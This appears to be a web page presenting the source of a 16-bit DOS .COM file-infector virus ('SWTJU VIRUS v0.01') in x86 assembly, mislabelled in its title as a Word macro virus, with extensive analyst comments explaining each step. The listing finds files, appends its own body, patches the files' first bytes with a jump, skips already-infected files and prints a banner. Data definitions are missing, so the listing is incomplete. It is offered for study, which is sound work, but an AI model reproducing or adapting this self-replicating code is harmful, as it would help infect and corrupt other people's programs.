naoga

台湾NO.1 WORD宏病毒

; Author's note: this virus has no real destructive payload and is provided
; only so that colleagues can understand how a virus works.
; NOTE(review): the listing does modify files on disk: it appends FILE_LENGTH
; bytes to the file it opens and rewrites that file's first three bytes.
; NOTE(review): the page title calls this a Word macro virus, but the listing
; is 16-bit x86 DOS assembly (MASM syntax, INT 21h file services), not macro code.

; Virus source listing
;
; Analysis summary (from the visible code only):
;   - Non-resident: no interrupt vector is hooked; all work happens at start-up.
;   - Restores three saved bytes to offset 100h, searches for a file through the
;     DOS find-first/find-next services, opens it read/write, appends its own
;     body and replaces the first three bytes with BUFFER1.
;   - Calls SHOW, which resets the text screen and prints STRING, then
;     far-returns to CS:0100h.
;   - Every error path ends at FAIL2, which terminates via INT 21h/AH=4Ch.
; The data labels BUFFER0, BUFFER1, BUFFER2, BUFFER3, DIR_BUFF, SCH_STR,
; FILE_NAME, FHANDLE and FILE_LENGTH are referenced but not defined in the
; visible part of the listing; statements about their layout are hedged.
; Artefacts visible here that an analyst can match on: the text
; 'SWTJU VIRUS v0.01 ' and the already-infected test at L-labels WRITE/CLOSE
; (first byte 0E9h plus a displacement relation to the file size).
code segment
ASSUME CS:CODE ,DS:CODE
; Make DS and ES equal to CS so data and string operations use the code segment.
VIRUS:MOV AX,CS
MOV DS,AX
MOV ES,AX
; 0BBh is the opcode of MOV BX,imm16 and the word GROW is its immediate, so
; these two lines execute as "MOV BX,<GROW>". GROW is rewritten further down
; before the body is written out, which makes BX the base offset applied to
; every data reference below ([BX] addressing). It is 0 in this listing.
DB 0BBH
GROW DW 0H
; Copy the three bytes saved in BUFFER0 back to offset 100h (the first bytes
; of a loaded .COM image). The direction flag is not set explicitly here;
; CLD only appears later in the listing.
LEA SI,BUFFER0[BX]
MOV DI,100H
MOV CX,3
REP MOVSB
; INT 21h/AH=1Ah: set the disk transfer area to DIR_BUFF.
MOV AH,1AH
LEA DX,DIR_BUFF[BX]
INT 21H
; INT 21h/AH=4Eh: find first file matching the pattern at SCH_STR with
; attribute mask 20h (archive). The pattern text is not visible in the listing.
MOV AH,4EH
MOV CX,20H
LEA DX,SCH_STR[BX]
INT 21H
JC FAIL0
; Overwrite 8 bytes at DIR_BUFF+1 with 3Fh ('?').
; NOTE(review): presumably the name field of the search template DOS keeps
; in the DTA, so the following find-next matches any name - confirm.
LEA DI,DIR_BUFF[BX]
MOV CX,8
INC DI
MOV AL,3FH
REP STOSB
; INT 21h/AH=4Fh: find next matching file.
MOV AH,4FH
INT 21H
; FAIL0/FAIL1 chain the carry flag forward: with CF set, control passes
; FAIL0 -> FAIL1 -> JMP FAIL2. The instructions between the INT 21h calls and
; these jumps (LEA, MOV, INC, REP STOSB) leave CF unchanged.
FAIL0:JC FAIL1
; Copy 13 bytes from FILE_NAME to SCH_STR.
; NOTE(review): FILE_NAME is presumably the found-name field of the DTA
; (13 bytes = 8.3 name plus terminator) - confirm against the data section.
LEA DI,SCH_STR[BX]
LEA SI,FILE_NAME[BX]
CLD
MOV CX,13
REP MOVSB
; INT 21h/AH=3Dh, AL=2: open the file named at FILE_NAME for read/write.
MOV AH,3DH
MOV AL,2
LEA DX,FILE_NAME[BX]
INT 21H
FAIL1:JNC FAIL3
JMP FAIL2
; Open succeeded: keep the handle. BX is saved/restored around each call
; below because INT 21h file services take the handle in BX.
FAIL3:MOV FHANDLE[BX],AX
; INT 21h/AH=42h, AL=0: seek to offset 0 from the start of the file.
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
; INT 21h/AH=3Fh: read the file's first 3 bytes into BUFFER0.
MOV AH,3FH
PUSH BX
LEA DX,BUFFER0[BX]
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
; INT 21h/AH=42h, AL=2: seek to end of file; DX:AX returns the file size.
; Only the low word (AX) is used afterwards.
MOV AH,42H
MOV AL,2
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
; BUFFER2 = size - 3.
; NOTE(review): presumably the displacement word of a 3-byte near JMP whose
; opcode byte sits at BUFFER1 - confirm against the data section.
SUB AX,3
MOV BUFFER2[BX],AX
; GROW = size + 100h, i.e. the offset at which the appended body will sit
; once the modified file is loaded. Stored before the body is written, so
; the written copy carries this value as its MOV BX immediate.
ADD AX,103H
MOV GROW[BX],AX
; Give up (FAIL2) if that offset plus FILE_LENGTH overflows 16 bits.
MOV DX,FILE_LENGTH[BX]
ADD AX,DX
JC FAIL2
; Already-modified check: if the first byte read is 0E9h (near JMP) and
; (size - 3) - BUFFER3 equals FILE_LENGTH, skip the writes and go to CLOSE.
; NOTE(review): BUFFER3 is presumably the word following the byte at
; BUFFER0, i.e. the file's existing JMP displacement - confirm.
MOV AH,BUFFER0[BX]
CMP AH,0E9H
JNZ WRITE
MOV AX,BUFFER2[BX]
SUB AX,BUFFER3[BX]
CMP AX,FILE_LENGTH[BX]
JZ CLOSE
; INT 21h/AH=40h: write FILE_LENGTH bytes starting at DS:BX to the file.
; The file pointer is still at end of file from the seek above, so this
; appends. MOV DX,BX appears twice; the second is redundant.
WRITE:MOV AH,40H
MOV DX,BX
PUSH BX
MOV DX,BX
MOV CX,FILE_LENGTH[BX]
MOV BX,FHANDLE[BX]
INT 21H
POP BX
; Seek back to the start of the file.
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
; Write 3 bytes from BUFFER1 over the file's first 3 bytes.
MOV AH,40H
LEA DX,BUFFER1[BX]
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
; INT 21h/AH=3Eh: close the file.
CLOSE: MOV AH,3EH
PUSH BX
MOV BX,FHANDLE[BX]
INT 21H
POP BX
; INT 21h/AH=2Ch: get system time. The AND result is unused because the
; conditional jump below is commented out, so SHOW is always called.
MOV AH,2CH
INT 21H
AND AH,02H
;JZ FAIL2
CALL SHOW
; Push CS:0100h and far-return to it: control passes to offset 100h, where
; the three bytes were restored at the top of the listing.
PUSH CS
MOV AX,100H
PUSH AX
XOR AX,AX
RETF
;JMP SHORT 100
; FAIL2: compute -(offset of BACK + BX - 0FEh), which is the displacement a
; near JMP at the DB 0E9H below would need to reach offset 100h, and store
; it in BACK. INT 21h/AH=4Ch then terminates the process, and no visible
; jump targets the DB 0E9H, so as written that JMP is not reached.
FAIL2: LEA AX,BACK[BX]
SUB AX,0FEH
NOT AX
INC AX
MOV BACK[BX],AX
MOV AH,4CH
INT 21H
; 0E9h = near JMP opcode; BACK is its 16-bit displacement.
DB 0E9H
BACK DW 0FFEBH
; SHOW: INT 10h with AH=0, AL=2 sets 80x25 text mode, then INT 21h/AH=9
; prints the '$'-terminated string at STRING.
SHOW:MOV AX,2
INT 10H
MOV AH,9
LEA DX,STRING[BX]
INT 21H
RET
; Message text: three line feeds, a carriage return, then the banner.
; No '$' terminator and none of the data labels used above appear in the
; visible listing, which ends here without closing the segment.
STRING DB 0AH,0AH,0AH,0DH
DB 'SWTJU VIRUS v0.01 '
